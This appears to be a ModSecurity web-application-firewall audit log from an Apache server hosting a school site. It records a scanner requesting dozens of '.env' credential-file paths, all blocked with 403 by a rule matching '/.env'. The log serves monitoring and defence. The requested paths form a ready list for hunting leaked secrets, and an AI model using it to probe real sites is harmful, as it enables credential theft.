Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5f923d08-Z--
--47d2ab52-A--
[20/Apr/2025:19:25:07 +0700] aATno1Tf0pL9EQC7JDUZ4wAAAEA 103.236.140.4 38450 103.236.140.4 8181
--47d2ab52-B--
GET /admin-app/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--47d2ab52-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--47d2ab52-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151907255287 651 (- - -)
Stopwatch2: 1745151907255287 651; combined=247, p1=217, p2=0, p3=0, p4=0, p5=30, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--47d2ab52-Z--
--5c8e8c6e-A--
[20/Apr/2025:19:25:07 +0700] aATno0AzeWrUIk0gvAsr7gAAANU 103.236.140.4 38452 103.236.140.4 8181
--5c8e8c6e-B--
GET /docs/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--5c8e8c6e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5c8e8c6e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151907325460 681 (- - -)
Stopwatch2: 1745151907325460 681; combined=252, p1=215, p2=0, p3=0, p4=0, p5=37, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5c8e8c6e-Z--
--c9d55b05-A--
[20/Apr/2025:19:25:07 +0700] aATno1Tf0pL9EQC7JDUZ5AAAAFg 103.236.140.4 38454 103.236.140.4 8181
--c9d55b05-B--
GET /.env_sample HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--c9d55b05-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c9d55b05-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151907395843 707 (- - -)
Stopwatch2: 1745151907395843 707; combined=248, p1=215, p2=0, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c9d55b05-Z--
--e659ec3f-A--
[20/Apr/2025:19:25:07 +0700] aATno1Tf0pL9EQC7JDUZ5QAAAFQ 103.236.140.4 38456 103.236.140.4 8181
--e659ec3f-B--
GET /.env.backup/.env.dev HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--e659ec3f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e659ec3f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151907467234 670 (- - -)
Stopwatch2: 1745151907467234 670; combined=249, p1=217, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e659ec3f-Z--
--55e02b39-A--
[20/Apr/2025:19:25:07 +0700] aATno1u16wJWB6g0mU8NsgAAABM 103.236.140.4 38464 103.236.140.4 8181
--55e02b39-B--
GET /client/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--55e02b39-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--55e02b39-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151907853336 793 (- - -)
Stopwatch2: 1745151907853336 793; combined=329, p1=296, p2=0, p3=0, p4=0, p5=33, sr=125, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--55e02b39-Z--
--8b948670-A--
[20/Apr/2025:19:25:07 +0700] aATno1u16wJWB6g0mU8NswAAAAI 103.236.140.4 38466 103.236.140.4 8181
--8b948670-B--
GET /private/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--8b948670-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8b948670-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151907929782 743 (- - -)
Stopwatch2: 1745151907929782 743; combined=254, p1=216, p2=0, p3=0, p4=0, p5=38, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8b948670-Z--
--f6e6d06b-A--
[20/Apr/2025:19:25:08 +0700] aATnpFTf0pL9EQC7JDUZ6AAAAEg 103.236.140.4 38470 103.236.140.4 8181
--f6e6d06b-B--
GET /media/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--f6e6d06b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f6e6d06b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151908297252 719 (- - -)
Stopwatch2: 1745151908297252 719; combined=298, p1=267, p2=0, p3=0, p4=0, p5=31, sr=110, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f6e6d06b-Z--
--3d01e64e-A--
[20/Apr/2025:19:25:08 +0700] aATnpFTf0pL9EQC7JDUZ6QAAAE4 103.236.140.4 38472 103.236.140.4 8181
--3d01e64e-B--
GET /.env.old HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--3d01e64e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3d01e64e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151908367069 688 (- - -)
Stopwatch2: 1745151908367069 688; combined=284, p1=252, p2=0, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3d01e64e-Z--
--031b0047-A--
[20/Apr/2025:19:25:08 +0700] aATnpFu16wJWB6g0mU8NtQAAABI 103.236.140.4 38474 103.236.140.4 8181
--031b0047-B--
GET /enviroments/.env.production HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--031b0047-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--031b0047-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151908437372 707 (- - -)
Stopwatch2: 1745151908437372 707; combined=257, p1=219, p2=0, p3=0, p4=0, p5=38, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--031b0047-Z--
--66337f3e-A--
[20/Apr/2025:19:25:08 +0700] aATnpFu16wJWB6g0mU8NtgAAAA4 103.236.140.4 38476 103.236.140.4 8181
--66337f3e-B--
GET /development/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--66337f3e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--66337f3e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151908507388 13223 (- - -)
Stopwatch2: 1745151908507388 13223; combined=25325, p1=218, p2=0, p3=0, p4=0, p5=12572, sr=67, sw=0, l=0, gc=12535
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--66337f3e-Z--
--44797d0a-A--
[20/Apr/2025:19:25:08 +0700] aATnpFTf0pL9EQC7JDUZ6gAAAE0 103.236.140.4 38478 103.236.140.4 8181
--44797d0a-B--
GET /.docker/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--44797d0a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--44797d0a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151908577632 722 (- - -)
Stopwatch2: 1745151908577632 722; combined=295, p1=264, p2=0, p3=0, p4=0, p5=30, sr=77, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--44797d0a-Z--
--45561f3b-A--
[20/Apr/2025:19:25:08 +0700] aATnpFTf0pL9EQC7JDUZ6wAAAEc 103.236.140.4 38480 103.236.140.4 8181
--45561f3b-B--
GET /wp-admin/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--45561f3b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--45561f3b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151908717195 718 (- - -)
Stopwatch2: 1745151908717195 718; combined=281, p1=244, p2=0, p3=0, p4=0, p5=37, sr=69, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--45561f3b-Z--
--81173a73-A--
[20/Apr/2025:19:25:08 +0700] aATnpFu16wJWB6g0mU8NtwAAAAc 103.236.140.4 38482 103.236.140.4 8181
--81173a73-B--
GET /project/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--81173a73-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--81173a73-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151908787274 715 (- - -)
Stopwatch2: 1745151908787274 715; combined=260, p1=221, p2=0, p3=0, p4=0, p5=39, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--81173a73-Z--
--a06ea722-A--
[20/Apr/2025:19:25:08 +0700] aATnpFu16wJWB6g0mU8NuQAAAAA 103.236.140.4 38488 103.236.140.4 8181
--a06ea722-B--
GET /wp-includes/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--a06ea722-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a06ea722-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151908857467 640 (- - -)
Stopwatch2: 1745151908857467 640; combined=247, p1=219, p2=0, p3=0, p4=0, p5=27, sr=63, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a06ea722-Z--
--0a504721-A--
[20/Apr/2025:19:25:08 +0700] aATnpFTf0pL9EQC7JDUZ7AAAAEk 103.236.140.4 38490 103.236.140.4 8181
--0a504721-B--
GET /wp-content/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--0a504721-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0a504721-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151908927383 660 (- - -)
Stopwatch2: 1745151908927383 660; combined=249, p1=222, p2=0, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0a504721-Z--
--8c734c6d-A--
[20/Apr/2025:19:25:08 +0700] aATnpMTCDeBrh52UaHS-UQAAAII 103.236.140.4 38492 103.236.140.4 8181
--8c734c6d-B--
GET /storage/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--8c734c6d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8c734c6d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151908998178 756 (- - -)
Stopwatch2: 1745151908998178 756; combined=309, p1=262, p2=0, p3=0, p4=0, p5=47, sr=70, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8c734c6d-Z--
--042bf335-A--
[20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ7QAAAEs 103.236.140.4 38494 103.236.140.4 8181
--042bf335-B--
GET /shop/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--042bf335-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--042bf335-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151909068108 719 (- - -)
Stopwatch2: 1745151909068108 719; combined=291, p1=255, p2=0, p3=0, p4=0, p5=36, sr=99, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--042bf335-Z--
--1a1d6e7b-A--
[20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ7gAAAFc 103.236.140.4 38496 103.236.140.4 8181
--1a1d6e7b-B--
GET /log/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--1a1d6e7b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1a1d6e7b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151909138193 770 (- - -)
Stopwatch2: 1745151909138193 770; combined=325, p1=288, p2=0, p3=0, p4=0, p5=37, sr=78, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1a1d6e7b-Z--
--d9667364-A--
[20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ7wAAAEE 103.236.140.4 38498 103.236.140.4 8181
--d9667364-B--
GET /index/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--d9667364-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d9667364-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151909208349 667 (- - -)
Stopwatch2: 1745151909208349 667; combined=248, p1=214, p2=0, p3=0, p4=0, p5=33, sr=64, sw=1, l=0, gc=0
